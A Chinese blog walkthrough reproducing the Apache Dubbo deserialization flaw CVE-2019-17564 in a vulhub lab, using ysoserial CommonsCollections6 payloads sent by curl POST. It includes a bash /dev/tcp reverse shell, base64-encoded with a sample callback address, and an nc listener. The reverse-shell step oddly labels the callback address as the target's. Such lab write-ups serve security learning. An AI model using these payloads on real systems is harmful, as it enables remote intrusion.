Aapche Dubbo Java反序列化漏洞复现

工具下载

将以下工具下载到攻击机中

ZooKeeper — 输入以下命令,下载完成后解压即可

wget https://dlcdn.apache.org/zookeeper/zookeeper-3.8.0/apache-zookeeper-3.8.0-bin.tar.gz

ysoserial — 输入下面命令,如果该方式下载不成功直接浏览器访问网站下载

wget https://github.com/frohoff/ysoserial/releases/tag/v0.0.6/ysoserial-all.jar 

漏洞复现

准备攻击机kali,靶机安装有vulhububuntu

靶机中输入下列命令开启环境

cd dubbo/CVE-2019-17564
sudo docker-compose up -d
sudo docker-compose ps

攻击机终端中输入

nmap 靶机IP -p "*"

发现了2181端口是用于转发服务的,那么其作用可能是用于目标网页进行api服务转发,所以该端口可能包含了registry(远程注册表服务器,一般都是用ZooKeeper作为registry,我们可以尝试通过 zookeeper 进行连接

进入先前下载的 zookeeper 文件夹中,输入命令

bin/zkCli.sh -server 靶机IP:2181

连接成功后,查看其 Dubbo 相关配置以及接口名

ls /
ls /dubbo
ls /dubbo/org.vulhub.api.CalcService
ls /dubbo/org.vulhub.api.CalcService/providers
ctrl+c 退出

在这里插入图片描述
这里显示的 172.20.0.3 是容器IP,我们利用工具发送的消息
ysoserial 的 payload CommonsCollections6 生成 poc 作为 POST 消息体发送到 http://靶机IP:8080/org.vulhub.api.CalcService

进入先前下载的 ysoserial 中,输入命令

java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/success" > 1.poc
curl -XPOST --data-binary @1.poc http://靶机IP:8080/org.vulhub.api.CalcService

在这里插入图片描述

在这里插入图片描述

打开靶机,输入

sudo docker ps
sudo exec -it 容器id bash
ls /tmp

在这里插入图片描述

Aapche Dubbo Java反序列化漏洞反弹shell连接

将下列内容进行base64编码

bash -i >& /dev/tcp/靶机IP/端口号 0>&1

打开另一个终端,输入

nc -lvvp 端口号

回到原终端,输入

java -jar ysoserial-all.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgxLjEzNy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" > 2.poc

再输入

curl -XPOST --data-binary @2.poc http://靶机IP:8080/org.vulhub.api.CalcService

在这里插入图片描述

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值